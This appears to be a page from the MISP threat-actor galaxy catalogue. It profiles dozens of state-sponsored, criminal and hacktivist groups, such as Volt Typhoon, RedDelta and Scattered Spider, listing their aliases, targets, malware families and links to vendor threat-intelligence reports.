https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/

Volt Typhoon

[Microsoft] Volt Typhoon, a state-sponsored actor based in China that typically focuses on espionage and information gathering. Microsoft assesses with moderate confidence that this Volt Typhoon campaign is pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.

[Secureworks] BRONZE SILHOUETTE likely operates on behalf the PRC. The targeting of U.S. government and defense organizations for intelligence gain aligns with PRC requirements, and the tradecraft observed in these engagements overlap with other state-sponsored Chinese threat groups.

The tag is: misp-galaxy:threat-actor="Volt Typhoon"

Volt Typhoon is also known as:

  • BRONZE SILHOUETTE

Table 12176. Table References

Links

https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

SmugX

The campaign, called SmugX, overlaps with previously reported activity by Chinese APT actors RedDelta and Mustang Panda. Although those two correlate to some extent with Camaro Dragon, there is insufficient evidence to link the SmugX campaign to the Camaro Dragon group.

The campaign uses new delivery methods to deploy (most notably – HTML Smuggling) a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors. Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods results in low detection rates, which until recently helped the campaign fly under the radar.

The tag is: misp-galaxy:threat-actor="SmugX"

Table 12177. Table References

Links

https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/

RedDelta

Likely Chinese state-sponsored threat activity group RedDelta targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor. Since at least 2019, RedDelta has been consistently active within Southeast Asia, particularly in Myanmar and Vietnam, but has also routinely adapted its targeting in response to global geopolitical events. This is historically evident through the group’s targeting of the Vatican and other Catholic organizations in the lead-up to 2021 talks between Chinese Communist Party (CCP) and Vatican officials, as well as throughout 2022 through the group’s shift towards increased targeting of European government and diplomatic entities following Russia’s invasion of Ukraine.

During the 3-month period from September through November 2022, RedDelta has regularly used an infection chain employing malicious shortcut (LNK) files, which trigger a dynamic-link library (DLL) search-order-hijacking execution chain to load consistently updated PlugX versions. Throughout this period, the group repeatedly employed decoy documents specific to government and migration policy within Europe. Of note, we identified a European government department focused on trade communicating with RedDelta command-and-control (C2) infrastructure in early August 2022. This activity commenced on the same day that a RedDelta PlugX sample using this C2 infrastructure and featuring an EU trade-themed decoy document surfaced on public malware repositories. We also identified additional probable victim entities within Myanmar and Vietnam regularly communicating with RedDelta C2 infrastructure.

RedDelta closely overlaps with public industry reporting under the aliases BRONZE PRESIDENT, Mustang Panda, TA416, Red Lich, and HoneyMyte.

The tag is: misp-galaxy:threat-actor="RedDelta"

RedDelta has relationships with:

  • overlaps: misp-galaxy:threat-actor="MUSTANG PANDA" with estimative-language:likelihood-probability="likely"

  • overlaps: misp-galaxy:mitre-intrusion-set="Mustang Panda - G0129" with estimative-language:likelihood-probability="likely"

Table 12178. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf

Worok

Worok is a cyber espionage group, mostly targeting Central Asia. The group toolset includes a C++ loader named CLRLoad, a PowerShell backdoor named PowHeartBeat, and a C# loader named PNGLoad.

The tag is: misp-galaxy:threat-actor="Worok"

Table 12179. Table References

Links

https://www.welivesecurity.com/2022/09/06/worok-big-picture/

MoustachedBouncer

MoustachedBouncer is a cyberespionage group discovered by ESET Research and first publicly disclosed in August 2023. The group has been active since at least 2014 and only targets foreign embassies in Belarus. Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets. The group uses two separate toolsets that we have named NightClub and Disco.

The tag is: misp-galaxy:threat-actor="MoustachedBouncer"

Table 12180. Table References

Links

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

Storm-0324

The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment.

The tag is: misp-galaxy:threat-actor="Storm-0324"

Storm-0324 is also known as:

  • DEV-0324

  • Sagrid

  • TA543

Storm-0324 has relationships with:

  • uses: misp-galaxy:malpedia="JSSLoader" with estimative-language:likelihood-probability="likely"

Table 12181. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/09/12/malware-distributor-storm-0324-facilitates-ransomware-access/

https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded

Scattered Canary

When the first member of Scattered Canary, who, for the purposes of this report, we call Alpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned the tricks of the trade from a mentor. However, within a few years, he had honed his craft enough to expand into romance scams, where he met his first “employee,” Beta. Once they had secured enough mules via their romance scams to launder their stolen money, they shifted from targeting individuals to targeting enterprises, and the group’s BEC operation was born.

The tag is: misp-galaxy:threat-actor="Scattered Canary"

Table 12182. Table References

Links

https://cofense.com/blog/gift-card-fraud-ecosystem-shifts-what-paxfuls-closing-means-for-business-email-compromise/

https://static.fortra.com/agari/pdfs/guide/ag-scattered-canary-gd.pdf

https://www.agari.com/blog/covid-19-unemployment-fraud-cares-act?_gl=1%2Ayzg6ns%2A_ga%2AMTkyMzIyOTI4MC4xNjk2MjUyMDA2%2A_ga_NHMHGJWX49%2AMTY5NjI1MjAwNS4xLjAuMTY5NjI1MjAwNS42MC4wLjA.&utm_source=press-release&utm_medium=prnewswire&utm_campaign=scattered20

Scattered Spider

Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.

The tag is: misp-galaxy:threat-actor="Scattered Spider"

Scattered Spider is also known as:

  • UNC3944

  • Muddled Libra

  • Oktapus

  • Scattered Swine

  • Scatter Swine

  • Octo Tempest

  • 0ktapus

  • Storm-0971

  • DEV-0971

Table 12183. Table References

Links

https://www.cybersecurity-insiders.com/scattered-spider-managed-mgm-resort-network-outage-brings-8m-loss-daily/

https://www.loginradius.com/blog/identity/oktapus-phishing-targets-okta-identity-credentials/

https://www.attackiq.com/2023/11/21/attack-graph-response-to-cisa-advisory-aa23-320a/

https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware

AtlasCross

NSFOCUS Security Labs recently discovered a new attack process based on phishing documents in their daily threat-hunting operations. Delving deeper into this finding through extensive research, they confirmed two new Trojan horse programs and many rare attack techniques and tactics. NSFOCUS Security Labs believes that this new attack process comes from a new APT attacker, who has a high technical level and cautious attack attitude. The phishing attack activity captured this time is part of the attacker’s targeted strike on specific targets and is its main means to achieve in-domain penetration. NSFOCUS Security Labs validated the high-level threat attributes of AtlasCross in terms of development technology and attack strategy through an in-depth analysis of its attack metrics. At this current stage, AtlasCross has a relatively limited scope of activity, primarily focusing on targeted attacks against specific hosts within a network domain. However, the attack processes they employ are highly robust and mature. NSFOCUS Security Labs deduce that this attacker is highly likely to deploy this attack process into larger-scale network attack operations.

The tag is: misp-galaxy:threat-actor="AtlasCross"

AtlasCross has relationships with:

  • uses: misp-galaxy:tool="DangerAds" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="AtlasAgent" with estimative-language:likelihood-probability="likely"

Table 12184. Table References

Links

https://nsfocusglobal.com/warning-newly-discovered-apt-attacker-atlascross-exploits-red-cross-blood-drive-phishing-for-cyberattack/

Void Rabisu

Void Rabisu is an intrusion set associated with both financially motivated ransomware attacks and targeted campaigns on Ukraine and countries supporting Ukraine.

The tag is: misp-galaxy:threat-actor="Void Rabisu"

Void Rabisu is also known as:

  • Tropical Scorpius

Void Rabisu has relationships with:

  • uses: misp-galaxy:malpedia="Cuba" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="ROMCOM RAT" with estimative-language:likelihood-probability="likely"

Table 12185. Table References

Links

https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html

https://www.trendmicro.com/en_za/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html

Camaro Dragon

In early 2023, the Check Point Incident Response Team (CPIRT) team investigated a malware incident at a European healthcare institution involving a set of tools mentioned in the Avast report in late 2022. The incident was attributed to Camaro Dragon, a Chinese-based espionage threat actor whose activities overlap with activities tracked by different researchers as Mustang Panda and LuminousMoth, whose focus is primarily on Southeast Asian countries and their close peers.

The tag is: misp-galaxy:threat-actor="Camaro Dragon"

Table 12186. Table References

Links

https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

Storm-0558

Storm-0558 is a China-based threat actor with espionage objectives. While there are some minimal overlaps with other Chinese groups such as Violet Typhoon (ZIRCONIUM, APT31), Microsoft maintain high confidence that Storm-0558 operates as its own distinct group

The tag is: misp-galaxy:threat-actor="Storm-0558"

Table 12187. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/

https://www.wiz.io/blog/storm-0558-compromised-microsoft-key-enables-authentication-of-countless-micr

https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/

Scarred Manticore

Scarred Manticore has been pursuing high-value targets for years, utilizing a variety of IIS-based backdoors to attack Windows servers. These include a variety of custom web shells, custom DLL backdoors, and driver-based implants.

The tag is: misp-galaxy:threat-actor="Scarred Manticore"

Table 12188. Table References

Links

https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/

Xiaoqiying

Xiaoqiying is a primarily Chinese-speaking threat group that is most well known for conducting website defacement and data exfiltration attacks on more than a dozen South Korean research and academic institutions in late-January 2023. Research from Recorded Futures Insikt Group has found that the groups affiliated threat actors have signaled a new round of cyberattacks against organizations in Japan and Taiwan. Although it shows no clear ties to the Chinese government, Xiaoqiying is staunchly pro-China and vows to target NATO countries as well as any country or region that is deemed hostile to China.

The tag is: misp-galaxy:threat-actor="Xiaoqiying"

Xiaoqiying is also known as:

  • Genesis Day

  • Teng Snake

Table 12190. Table References

Links

https://www.recordedfuture.com/xiaoqiying-genesis-day-threat-actor-group-targets-south-korea-taiwan

https://medium.com/s2wblog/%E5%8F%98%E8%84%B8-teng-snake-a-k-a-code-core-8c35268b4d1a

https://therecord.media/samsung-investigating-claims-of-hack-on-south-korea-systems-internal-employee-platform/

UNC3886

UNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns. UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support. Their ability to manipulate firewall firmware and exploit a zero-day indicates they have curated a deeper-level of understanding of such technologies. UNC3886 has modified publicly available malware, specifically targeting *nix operating systems.

The tag is: misp-galaxy:threat-actor="UNC3886"

Table 12192. Table References

Links

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence

https://www.mandiant.com/resources/blog/vmware-esxi-zero-day-bypass

https://www.mandiant.com/resources/blog/vmware-detection-containment-hardening

Earth Longzhi

Earth Longzhi is a subgroup of APT41 targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji, and using “stack rumbling” via Image File Execution Options (IFEO), a new denial-of-service (DoS) technique to disable security software.

The tag is: misp-galaxy:threat-actor="Earth Longzhi"

Earth Longzhi is also known as:

  • SnakeCharmer

Table 12193. Table References

Links

https://www.picussecurity.com/resource/blog/cyber-threat-intelligence-report-may-2023

https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html

https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/

https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html

Redfly

Redfly hacked a national electricity grid organization in Asia and maintained persistent access to the network for about six months. Researchers discovered evidence for this attack between 28 February and 3 August 2023 after noticing suspicious malware activity within the organization’s network.

The tag is: misp-galaxy:threat-actor="Redfly"

Table 12194. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/critical-infrastructure-attacks

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-power-suppliers-network-infiltrated-for-6-months-by-redfly-hackers-active-iocs/

TetrisPhantom

TetrisPhantom relies on compromising of certain type of secure USB drives that provide hardware encryption and is commonly used by government organizations. While investigating this threat, experts identified an entire spying campaign that uses a range of malicious modules to execute commands, collect files and information from compromised computers and transfer them to other machines also using secure USB drives.

The tag is: misp-galaxy:threat-actor="TetrisPhantom"

Table 12195. Table References

Links

https://usa.kaspersky.com/blog/sas-2023-research/29254/

https://securelist.com/apt-trends-report-q3-2023/110752/

Earth Estries

Trend Micro found that Earth Estries relies heavily on DLL sideloading to load various tools within its arsenal. Aside from the backdoors previously mentioned, this intrusion set also utilizes commonly used remote control tools like Cobalt Strike, PlugX, or Meterpreter stagers interchangeably in various attack stages. These tools come as encrypted payloads loaded by custom loader DLLs.

The tag is: misp-galaxy:threat-actor="Earth Estries"

Table 12196. Table References

Links

https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html

https://www.sentinelone.com/labs/cyber-soft-power-chinas-continental-takeover/

GoldenJackal

GoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-related logic. Kaspersky believes the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server. They developed a collection of .NET malware tools known as Jackal.

The tag is: misp-galaxy:threat-actor="GoldenJackal"

Table 12197. Table References

Links

https://securelist.com/it-threat-evolution-q2-2023/110355/

https://securelist.com/goldenjackal-apt-group/109677/

Lancefly

Lancefly targets government, aviation, and telecom organizations in South and Southeast Asia. They use a custom backdoor named Merdoor, developed since 2018, and employ various tactics to gain access, including phishing emails, SSH credential brute-forcing, and exploiting server vulnerabilities. Additionally, Lancefly has been observed using a newer version of the ZXShell rootkit and tools like PlugX and ShadowPad RAT, which are typically associated with Chinese-speaking APT groups.

The tag is: misp-galaxy:threat-actor="Lancefly"

Table 12198. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor

LofyGang

LofyGang has been found to be linked to more than 200 malicious packages, with thousands of installations throughout 2022. The group, believed to have been operating for more than a year, has multiple hacking objectives, including stealing credit card information and stealing user accounts including Discord Inc. premium accounts, streaming services accounts such as Disney+ and Minecraft accounts.

The tag is: misp-galaxy:threat-actor="LofyGang"

Table 12199. Table References

Links

https://checkmarx.com/blog/lofygang-software-supply-chain-attackers-organized-persistent-and-operating-for-over-a-year/

Storm-0062

The cyberattack campaign that Microsoft uncovered was launched by a China-linked hacking group called Storm-0062. According to the company, the group is launching cyberattacks by exploiting a vulnerability in the Data Center and Server editions of Confluence. Those are versions of the application that companies run on-premises.

The tag is: misp-galaxy:threat-actor="Storm-0062"

Storm-0062 is also known as:

  • Oro0lxy

  • DarkShadow

Table 12200. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/monthly-news-november-2023/ba-p/3970796

https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-41-5/

https://twitter.com/MsftSecIntel/status/1711871732644970856

SparklingGoblin

ESET researchers have discovered a new undocumented modular backdoor, SideWalk, being used by an APT group they’ve named SparklingGoblin; this backdoor was used during one of SparklingGoblin’s recent campaigns that targeted a computer retail company based in the USA. This backdoor shares multiple similarities with another backdoor used by the group: CROSSWALK.

The tag is: misp-galaxy:threat-actor="SparklingGoblin"

Table 12201. Table References

Links

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

Kasablanka

The Kasablanka group is a cyber-criminal organization that has specifically targeted Russia between September and December 2022, using various payloads delivered through phishing emails containing socially engineered lnk files, zip packages, and executables attached to virtual disk image files.

The tag is: misp-galaxy:threat-actor="Kasablanka"

Table 12202. Table References

Links

https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/

https://www.welivesecurity.com/2021/09/07/bladehawk-android-espionage-kurdish/

https://blog.talosintelligence.com/get-a-loda-this/

YoroTrooper

YoroTrooper’s main targets are government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States, based on Cisco Talos analysis. YoroTrooper was also observed compromising accounts from at least two international organizations: a critical European Union health care agency and the World Intellectual Property Organization. Successful compromises also included Embassies of European countries including Azerbaijan and Turkmenistan.

The tag is: misp-galaxy:threat-actor="YoroTrooper"

Table 12203. Table References

Links

https://blog.talosintelligence.com/attributing-yorotrooper/

https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/

Metador

Metador primarily targets telecommunications, internet service providers, and universities in several countries in the Middle East and Africa. Metador’s attack chains are designed to bypass native security solutions while deploying malware platforms directly into memory. SentinelLabs researchers discovered variants of two long-standing Windows malware platforms, and indications of an additional Linux implant.

The tag is: misp-galaxy:threat-actor="Metador"

Table 12204. Table References

Links

https://www.sentinelone.com/labs/the-mystery-of-metador-unpicking-mafaldas-anti-analysis-techniques/

https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/

SiegedSec

SiegedSec, a hacktivist collective, emerged coincidentally just days before Russia’s invasion of Ukraine. Under the leadership of the hacktivist known as “YourAnonWolf,” the group swiftly gained strength, announcing an increasing number of victims after its inception. The group humorously self-identifies as “gay furry hackers” and is renowned for its comical slogans and the use of vulgar language. SiegedSec has affiliations with other hacker groups like GhostSec and typically consists of members aged between 18 and 26.

The tag is: misp-galaxy:threat-actor="SiegedSec"

Table 12205. Table References

Links

https://therecord.media/nato-siegedsec-unclassified-websites-alleged-cyberattack

https://socradar.io/threat-actor-profile-siegedsec/

https://socradar.io/the-five-families-hacker-collaboration-redefining-the-game/

https://therecord.media/fort-worth-officials-say-leaked-data-was-public

https://webz.io/dwp/exclusive-hacktivists-attack-anti-abortion-u-s-states/

https://www.darkowl.com/blog-content/darkowl-threat-actor-spotlight-siegedsec-and-leaked-data/

Carderbee

Symantec recently reported on activity attributed to a threat actor group dubbed Carderbee. In the campaign, the threat actors target entities in Hong Kong and other regions of Asia via a supply chain attack leveraging the legitimate Cobra DocGuard software. The activity began as early as September 2022.

The tag is: misp-galaxy:threat-actor="Carderbee"

Table 12207. Table References

Links

https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia

https://blog.polyswarm.io/carderbee-targets-hong-kong-in-supply-chain-attack

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse

UNC3890

A suspected Iranian threat activity cluster has been linked to attacks aimed at Israeli shipping, government, energy, and healthcare organizations, in a campaign stretching back to late 2020. Researchers believe that the data harvested during the campaign could be used to support various activities. UNC3890, the threat actor behind the attacks, deployed two proprietary pieces of malware – a backdoor named “SUGARUSH” and a browser credential stealer called “SUGARDUMP”, which exfiltrates password information to email addresses registered with Gmail, ProtonMail, Yahoo and Yandex email services. The threat actor also employs a network of C&C servers that host fake login pages impersonating legitimate platforms such as Office 365, LinkedIn and Facebook. These servers are designed to communicate with the targets and also with a watering hole hosted on the login page of a legitimate Israeli shipping company.

The tag is: misp-galaxy:threat-actor="UNC3890"

Table 12208. Table References

Links

https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/

https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping

RedStinger

In October 2022, Kaspersky identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.

The tag is: misp-galaxy:threat-actor="RedStinger"

RedStinger is also known as:

  • Bad Magic

Table 12209. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger

https://securelist.com/bad-magic-apt/109087/

Witchetty

Witchetty was first documented by ESET in April 2022, who concluded that it was one of three sub-groups of TA410, a broad cyber-espionage operation with some links to the Cicada group (aka APT10). Witchetty’s activity was characterized by the use of two pieces of malware, a first-stage backdoor known as X4 and a second-stage payload known as LookBack. ESET reported that the group had targeted governments, diplomatic missions, charities, and industrial/manufacturing organizations.

The tag is: misp-galaxy:threat-actor="Witchetty"

Witchetty is also known as:

  • LookingFrog

Table 12210. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-witchetty-apt-group-active-iocs

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/

IndigoZebra

IndigoZebra is a Chinese state-sponsored actor mentioned for the first time by Kaspersky in its APT Trends report Q2 2017, targeting, at the time of its discovery, former Soviet Republics with multiple malware strains including Meterpreter, Poison Ivy, xDown, and a previously unknown backdoor called “xCaon.”

The tag is: misp-galaxy:threat-actor="IndigoZebra"

Table 12212. Table References

Links

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

https://www.rewterz.com/rewterz-news/rewterz-threat-intel-indigozebra-apt-group-targeting-central-asia-active-iocs

https://securelist.com/apt-trends-report-q2-2017/79332/

GhostSec

GhostSec is a hacktivist group that emerged as an offshoot of Anonymous. They primarily focused on counterterrorism efforts and monitoring online activities associated with terrorism. They gained prominence following the 2015 Charlie Hebdo shooting in Paris and the rise of ISIS.

The tag is: misp-galaxy:threat-actor="GhostSec"

GhostSec is also known as:

  • Ghost Security

Table 12213. Table References

Links

https://www.uptycs.com/blog/ghostlocker-ransomware-ghostsec

https://forescoutstage.wpengine.com/blog/the-increasing-threat-posed-by-hacktivist-attacks-an-analysis-of-targeted-organizations-devices-and-ttps/

OilAlpha

OilAlpha has almost exclusively relied on infrastructure associated with the Public Telecommunication Corporation (PTC), a Yemeni government-owned enterprise reported to be under the direct control of the Houthi authorities. OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets. It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices.

The tag is: misp-galaxy:threat-actor="OilAlpha"

Table 12214. Table References

Links

https://www.zimperium.com/blog/zimperium-mtd-against-oilalpha-a-comprehensive-defense-strategy/

https://www.recordedfuture.com/oilalpha-likely-pro-houthi-group-targeting-arabian-peninsula

HiddenArt

It was observed that a mobile network threat actor designated as ‘HiddenArt’ actively sustains a capacity to remotely access the personal devices of targeted individuals around the world on an ongoing basis. Since detecting this threat actor, periodic reconnaissance activities were observed in at least 7 target mobile networks around the world and given the wide geographic distribution of these targeted mobile operators, it is probable that the threat actor is active on a global scale.

The tag is: misp-galaxy:threat-actor="HiddenArt"

Table 12215. Table References

Links

https://www.enea.com/insights/the-hunt-for-hiddenart/

REF5961

Elastic’s security team has published a report on REF5961, a cyber-espionage group they found on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN). Elastic says it found the group’s tools next to the malware of another cyber-espionage group it tracks as REF2924. REF5961’s arsenal includes malware such as EAGERBEE, RUDEBIRD, and DOWNTOWN.

The tag is: misp-galaxy:threat-actor="REF5961"

Table 12216. Table References

Links

https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set

https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor

REF2924

A group monitored as REF2924 by Elastic Security Labs is wielding novel data-stealing malware — an HTTP listener written in C# dubbed Naplistener by the researchers — in attacks against victims operating in southern and southeast Asia.According to a blog post by Elastic senior security research engineer Remco Sprooten, in that region of the world, network-based detection and prevention technologies are the de facto method for securing many environments.

The tag is: misp-galaxy:threat-actor="REF2924"

Table 12217. Table References

Links

https://www.elastic.co/security-labs/ref2924-howto-maintain-persistence-as-an-advanced-threat

https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set

Storm-1133

In early 2023, Microsoft In early 2023, observed a wave of activity from a Gaza-based group that we track as Storm-1133 targeting Israeli private sector energy, defense, and telecommunications organizations.

The tag is: misp-galaxy:threat-actor="Storm-1133"

Table 12218. Table References

Links

https://www.microsoft.com/en-us/security/security-insider/microsoft-digital-defense-report-2023

https://therecord.media/hacktivists-take-sides-israel-palestinian

TA499

TA499, also known as Vovan and Lexus, is a Russia-aligned threat actor that has aggressively engaged in email campaigns since at least 2021. The threat actor’s campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.

The tag is: misp-galaxy:threat-actor="TA499"

TA499 is also known as:

  • Vovan

  • Lexus

Table 12219. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/dont-answer-russia-aligned-ta499-beleaguers-targets-video-call-requests

BadRory

Kaspersky researchers have identified a new APT group named BadRory that has mounted two waves of spear-phishing attacks against Russian organizations. The campaigns took place in October 2022 and April 2023 and leveraged boobytrapped Office emails. Targets included government entities, military contractors, universities, and hospitals.

The tag is: misp-galaxy:threat-actor="BadRory"

Table 12220. Table References

Links

https://securelist.com/apt-trends-report-q3-2023/110752/

SharpPanda

SharpPanda, an APT group originating from China, has seen a rise in its cyber-attack operations starting from at least 2018. The APT group utilizes spear-phishing techniques to obtain initial access, employing a combination of outdated Microsoft Office document vulnerabilities, novel evasion techniques, and highly potent backdoor malware.

The tag is: misp-galaxy:threat-actor="SharpPanda"

Table 12221. Table References

Links

https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-sharppanda-chinese-apt-group-targets-southeast-asian-government-active-iocs

https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/

DustSquad

Prodaft researchers have published a report on Paperbug, a cyber-espionage campaign carried out by suspected Russian-speaking group Nomadic Octopus and which targeted entities in Tajikistan. According to Prodaft, known compromised victims included high-ranking government officials, telcos, and public service infrastructures. Compromised devices also included OT devices, besides your typical computers, servers, and mobile devices. In typical Prodaft fashion, the company also gained access to one of the group’s C&C server backend panels.

The tag is: misp-galaxy:threat-actor="DustSquad"

DustSquad is also known as:

  • Nomadic Octopus

Table 12223. Table References

Links

https://securelist.com/octopus-infested-seas-of-central-asia/88200/

https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf

https://www.virusbulletin.com/conference/vb2018/abstracts/nomadic-octopus-cyber-espionage-central-asia/

KromSec

KromSec is a hacktivist group that claims to be composed of hackers, activists, writers, and journalists. The group has been involved in a number of high-profile cyberattacks, including a cyber offensive against Iran in September 2022 and the sale of the database of the Iran Ministry of Industries and Mines on a hacker forum in November 2023. KromSec’s attacks have been met with mixed reactions, but the group has quickly made a name for itself as a significant threat to governments and organizations around the world.

The tag is: misp-galaxy:threat-actor="KromSec"

Table 12224. Table References

Links

https://thecyberexpress.com/kromsec-sells-iran-ministry-database-dark-web/

https://cybershafarat.com/2022/11/17/kromsec-outs-anonopsse-as-iranian-regime-makes-statement/

Cyber Av3ngers

The hacktivist group ‘Cyber Av3ngers’ has historically claimed attacks on Israel’s critical infrastructures. It has been launching DDoS attacks and claiming breach of Israeli networks with supporting data leaks.

The tag is: misp-galaxy:threat-actor="Cyber Av3ngers"

Table 12225. Table References

Links

https://securelist.com/a-hack-in-hand-is-worth-two-in-the-bush/110794/

https://cyberwarzone.com/cyber-av3ngers-claims-infiltration-of-israeli-water-treatment-stations-amid-ongoing-conflict/

https://cyberwarzone.com/hacking-group-cyber-av3ngers-claims-responsibility-for-yavne-power-outages-what-you-need-to-know/

Altahrea Team

Altahrea Team is a pro-Iranian hacking group that has been active since at least 2020. The group has claimed responsibility for a number of cyberattacks, including DDoS attacks against Israeli websites, a hack of the Israel Airports Authority website, and a cyberattack on the Orot Yosef power plant in Israel.

The tag is: misp-galaxy:threat-actor="Altahrea Team"

Table 12226. Table References

Links

https://securelist.com/ddos-attacks-in-q2-2022/107025/

https://www.timesofisrael.com/cyberattack-on-health-ministry-website-blocks-overseas-access/

https://techmonitor.ai/technology/cybersecurity/alahrea-team-power-plant-fire-israel

https://www.presstv.ir/Detail/2022/07/27/686324/Iraqi-hacker-group—​ALtahrea-Team—​targets-Israeli-IT,-e-commerce-companies-with-major-cyber-attack

https://www.hackread.com/pro-iran-altahrea-hit-port-of-london-website-ddos-attack/

https://nsi-globalcounterintelligence.com/cyber-security/pro-iran-hackers-target-israel-airports-authority-website/

1937CN

1937CN is a Chinese hacking group that has been active since at least 2013. The group is known for targeting Vietnamese organizations, including government agencies, businesses, and media outlets. 1937CN has been linked to a number of high-profile cyberattacks, including the hacking of Vietnam Airlines in 2016 and the defacement of Vietnamese government websites in 2015.

The tag is: misp-galaxy:threat-actor="1937CN"

Table 12227. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-southeast-asian-firms.html

https://www.recordedfuture.com/international-hacktivism-analysis/

http://securityaffairs.co/wordpress/49876/hacking/china-1937cn-team-vietnam.html

https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a

ShroudedSnooper

In September 2023, Cisco Talos identified a new malware family that it calls ‘HTTPSnoop’ being deployed against telecommunications providers in the Middle East. They also discovered a sister implant to 'HTTPSnoop,’ that they are naming ‘PipeSnoop,’ which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. Based on these findings, the researchers assess with high confidence that both implants belong to a new intrusion set that it named ‘ShroudedSnooper.’

The tag is: misp-galaxy:threat-actor="ShroudedSnooper"

Table 12228. Table References

Links

https://blog.talosintelligence.com/introducing-shrouded-snooper/

https://www.sentinelone.com/labs/the-israel-hamas-war-cyber-domain-state-sponsored-activity-of-interest/

